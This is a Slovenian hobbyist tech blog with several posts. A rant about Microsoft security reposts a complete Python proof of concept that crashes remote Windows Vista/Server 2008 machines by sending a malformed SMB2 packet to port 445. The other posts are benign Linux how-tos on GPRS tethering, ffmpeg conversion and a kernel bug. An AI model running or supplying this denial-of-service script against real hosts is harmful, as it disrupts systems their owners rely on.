Another day in a geek’s life

Pred par dnevi je na slashdotu pojavil topic¹  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 “ql”, in kok je Linux “beden”.  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Torej… ko pride do kakega grdega b00ga, exploita ipd, so userji “on their own”, če uporabljajo Microsoft priozvode, so pa “safe and secure”…

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z ‘zagarantirano varnostjo’? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

geek stuff, rant 0-day, exploit, linux, microsoft, python

Pred časom sem pisal kako skonfigurirati SE K610 za uporabo kot GPRS modem na linuxu.

Medtem sem kupil novega SE P1i, in ker je telefon novejši, boljši, ima everything but a kitchen sink, seveda NE podpira delovanja v bluetooth NAP (network access point)¹ . Zato je bilo potrebno urediti dostop do interneta prek Dial-up networkinga.

Za povezavo prek bluetootha je potrebno prvo poiskati bdaddr in kanal² (`sdptool search DUN`). Potem s pomočjo orodja ‘rfcomm’ ustvarimo povezavo na telefon:

rfcomm bind rfcomm0 <bdaddr> <kanal>

Sedaj le še skonfiguriramo povezavo prek nega od dial-up programov, a to zna biti bolj tricky kot izgleda. Default konfiguracije v wvdial-u seveda ne delajo.  Po mnogo poskusih in copy-pasteih z raznih blogov in strani, sem našel konfiguracijo, ki je delovala³.

Delujoč wvdial.conf:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","Internet"
Modem = /dev/rfcomm0
Phone = *99#
Username = mobitel
Password = internet
New PPPD = yes
ISDN = no
BAUD = 115200
Stupid Mode = yes
Carrier Check = no

Potem poženemo `wvdial`, in vzpostavi se povezava na internet.  Poskušamo ‘ping’-ati google, a ni mogoče resolvati naslova. Očitno (vsaj pri meni) wvdial/pppd ne nastavi DNS naslovov, a na srečo jih ‘wvdial’ po povezavi izpiše. Zato je potrebno le še prepisati DNS naslov (ip) v datoteko “/etc/resolv.conf” v obliki “namserver <ip naslov>“⁴

Upam da bo še komu to koristilo (še posebej raznim Itak!-ovcem in podobnim, ki imate/mo že zakupljene količine podatkov v naročniških paketih).

geek stuff dial-up, gprs, internet, linux, mobitel

V ponedeljek sem bil na začetniški Linux delavnici, ki je, vsaj kolikor vem, organizirana za tretje letnike študentov telekomunikacij na FE-ju.

Najprej je trea razložiti, zakaj sem se je sploh udeležil¹. Pa naj bo po alinejah:

• ne more škoditi
• uči se uporaba ubuntuja z gnome-om seveda, torej klik-klik operacije, ki jih nikoli nisem ne uporabljal, ne znal
• ljudje se kregajo z mano da fluxbox z 20imi terminali ni desktop okolje
• dobim potrdilo o udeležbi, ki tudi ne more škoditi
• kadarkoli lahko ne-pridem če se mi ne da več
• v povezavi z zgornjo točko: zastonj je

Po cca 45minutni teoriji in zgodovini linuxa, ki nam jo je odpredaval May, je sledilo spoznavanje z Ubuntujem. In kaj sem se naučil?

• zapakirane teme (.tar.gz, .tar.bz2) lahko drag-and-dropaš na theme selector, in avtomatsko se naloži izbrana tema
• v OpenOffice draw-u se da risati flowcharte
• če instaliras sistem tajnici, ki je navajena na windowse, obvezno preimenuj OO Writer v M$ Word
• v OO Drawu se da tudi iz 2d slik zgenerirati 3d ali rotacijske 3d slike²
• če imaš pc priklopljen na projektor izključi vse IM programe (oz.  IM program v ednini, če uporabljaš pidgin)
• v OO-ju obstaja nekaj (česar ime sem pozabil) precej podobno WordArtu iz office-a 97(?)
• če boš imel pc priklopljen na projektor, in odpiral mail programe, izbriši vse maile z viagra spamom, in tiste ki vsebujejo ‘xxx’ v subjectu
• Evolution zna (baje) syncati z symbianom (ni mi še uspelo, opensync, libsyncml, ipd imajo neke probleme, a sinhronizacija dela z kmobiletools)
• OpenOffice ima vgrajen OO Base, nekaj kot M$ Access, in se zna baje povezovati z MySQL-om (nisem še sprobal)
• ozadje se da zamenjati tudi brez terminala in ‘fbsetbg’ (na fluxboxu se ne da…vsaj zdi se mi)
• Cavazza tudi po gimp-anju izgleda še vedno čudno
• če imaš sliko Cavazze v home-u zaradi enih predavanj, jo še pred drugimi izbriši
• LaTeX je v pisanju formul še vedno hitrejši od česarkoli kar premore OO.org )

No ja… dovolj da bom prišel tudi naslednjič… vprašanje le koliko bo še klikanja, koliko pa dolgočasnega grepanja, cutanja, headanja in tailanja, ki mi vsak dan posebej polepšuje dan.

faks, geek stuff delavnica, linux, tk

link:
http://bugzilla.kernel.org/show_bug.cgi?id=11382

Release candidate novega (2.6.27) kernela na linuxu (očitno) zaradi napake v driverju prepiše (in s tem domnevno trajno uniči) eeprom v mrežnih karticah Intel (novi e1000e driver).

Torej tisti, ki imate v laptopih Intelovo mrežno kartico (med lastnike le-te sodim tudi sam), ne preveč eksperimentirat z novimi verzijami kernela. Sodeč po changelogu je zadeva popravljena v -rc7. Torej, ne uporabljat ničesar umes, če imate tako kartico.

2.6.26 (stable torej) z e1000 driverjem dela (vsaj meni) čisto v redu.

geek stuff, rant e1000, eeprom, ethernet, kernel, linux, network

Za windowse obstaja milijon zblj-to-3gp converterjev, eni so plačljivi, eni zastonj, eni zraven instalirajo še kak virus, reklame (gator :/ ipd sranja),… Kaj pa za linux? Se da pretvoriti kak filmček v 3gp format za ogled na mobilnem telefonu? Seveda se da!

Kaj potrebujemo?

• ffmpeg z amr_nb podporo (pod gentoojem to dobimo če vključimo amrnb USE-flag in emergamo ffmpeg)
• Malo smisla za navigacijo in delo v konzoli (torej da znamo priti v konzoli v nek direktorij, in tam copy-pastati neko kodo, in malo popraviti po potrebi)

Torej, v nekem direktoriju imamo nek film, ki se imenuje ‘film.avi’. Vse kar je potrebno narediti je, da se v konzoli premaknemo v ta direktorij kjer je film, in v konzolo skopiramo naslednjo kodo:

ffmpeg -i film.avi -s qcif -r 12 -ac 1 -ar 8000 -b 30k -ab 12.2k film.3gp

Ta ukaz požene ffmpeg, ki prebere “film.avi” (ime izvornega filma seveda lahko spremenimo po želji), spremeni velikost slike v qcif (176×144px) pri 12ih fpsjih (sličicah na sekundo), avdio spremeni v mono (1 kanal) pri 8khz, za sliko uporabi 30 bps (lahko spremenimo tudi na malo več, vendar razlika ni velika) in avdio na 12.2kbps (kar je največ za amr_nb)… in vse skupaj shrani v datoteko ‘film.3gp’ (ime tudi lahko spremenimo po želji.

Pretvarjanje traja nekaj časa (pri meni okoli 0.3*čas_trajanja_filma…kar niti ni toliko). Če med pretvarjanjem pritisnemo tipko ‘q’ se pretvarjanje ustavi, in film zaključi, torej lahko pretvorimo samo nekaj sekund filma, in preverimo kako bo izgledal pretvorjen filmček.

Potem ga je le še treba prenesti na gsm… prek kabla, kartice.. ali pa kar prek bluetootha.

Za prenos prek bluetootha je (meni osebno) ql program ussp-push. Ko ga instaliramo, v konzoli poženemo ukaz “ussp-push imemobitela@ film.3gp film.3gp” (torej ussp-push, ime vašega mobitela, ali pa kar bdaddr, torej naslov naprave, ki ga lahko pogledamo z ‘hcitool scan’ – pozor(!) za imenom je nujno afna (@). Potem pa ime datoteke na disku, in ime ki se bo shranilo na gsm – lahko sta seveda enaka.). Sledi pisk, vprašanje če hočeš sprejeti… ‘da’… in že se pošilja.

Kakšna je kvaliteta slike? Precej tko-tko… ampak za gsm čisto dobra. Velikost? 42 minutna serija se mi je stisnila na ~10mb. Ja.. je zanič slika… ampak se vidi bistvo.

Za malo lepšo sliko (malo pod 1mb/min) lahko uporabimo tudi:

ffmpeg -i film.avi -s qcif -r 12 -ac 1 -ar 8000  -ab 12.2k -b 100k  film.3gp

Če imaste pa večji ekran pa lahko tudi:

ffmpeg -i film.avi -s cif -r 12 -ac 1 -ar 8000  -ab 12.2k -b 150k  film.3gp

Amm.. kbps za video se spreminja s časom.. tako da tud če naštimate 100kbps, bo začel pri malo večji vrednosti (ali pa manjši) in se določeni vrednosti počasi približeval

ps: če že mislte gledat filmčke ipd. na mobitelu nekje zunaj, si nabavte slušalke! Dost mam že klincov ki naglas poslušajo hreščečo musko na mobitelih, ponavad kje bolj zadaj na busu, al pa kr na ulci.

geek stuff 3gp, bluetooth, ffmpeg, linux, obex

Zadnjih par dni sem bil na vikendu, kjer smo menjali streho (pomojem edini zadnje čase ki NE zaradi toče, ampak več o tem kdaj drugič, mogoče še s kakimi slikami).

Ker pač tam ni neke hude infrastrukture, mi za dostop do interneta ostaneta dialup in gprs. Ker sem dialup modem pozabil doma, mi torej ostane samo še gprs. Kako se pa na internet priključimo prek mobitela (torej brez tiste drage škatlice kjer je gprs/umts modem)?

Potrebujemo en laptop ki ima ugrajen bluetooth modul (oz kakršenkoli komp, ki ima bluetooth), en mobitel ki podpira PAN povezavo (moj SE K610i podpira… večina mobitelov mlajših od par let bi morala tudi, toda ne zagoavljam nič), in umts ali gprs povezavo (odvisno od oddajnika, mislim da gprs podpirajo že vsi, umts (3g) pa v vseh malo večjih mestih).

Na kompjutru more bit instaliran BlueZ. Preverite če obstaja program ‘pand’ (mogoče ga je potrebno zagnati kot root).

No.. pa gremo:
Prvo je treba najti “naslov” od mobitela (bdaddr).

U konzolo (najbrž kot root) upišemo:

 hcitool scan

in izpiše se nam seznam v obliki:

<bdaddr>  <"ime" telefona>

Sedaj se treba povezati na telefon s pomočjo “pand”-ja. Utipkamo:

pand -c <bdaddr>

(seveda namest o “<bdaddr>” upišemo naslov vašega telefona ki ste ga maloprej videli kot izpis prejšnjega ukaza). Komp se bo povezal na gsm, gsm pa naprej na internet. Med mrežnimi interfejsi se pojavi nov interfejs (ne znam slovenske besede za interface,… žal..), ki ga vidimo če utipkamo “ifconfig -a”. Ime interfejsa (vsaj pri meni) je “bnep0″. Sedaj je le še potrebno pridobiti IP in route-e, in povezava bo delala. Utipkamo:

dhclient bnep0

ali

dhcpcd bnep0

…počakamo par sekund, in že smo na internetu. Po tem ko končamo z uporabo, samo prekinemo povezavo z ukazom:

pand -K

…in tudi na mobitelu bi se morala prekiniti povezava z internetom.

Zakaj to pišem (še) sem? Ker so me že ene trije spraševali kako se to naredi na linuxu. Koliko stane to? … preveč. Toda če ni alternative… je tud to zadost da se poberejo maili. Plačuje se ponavadi na kilobajte… torej na kolčino prenešenih informacij. Zato je v takih primerih tekstovni browser ala links precej ql Hitrost? Moj rekord je ~7kbps… sam pravm.. za maile pa za tekst zadost… za vec se pa pac kako drugače znajdeš. Warranty? Za use kar unics pri sledenju takim in podobnim navodilom si sam kriv… men dela… če teb ne.. nism jst kriv

ps: ping do google-a je med 800 in 1000ms…

geek stuff bluetooth, gprs, linux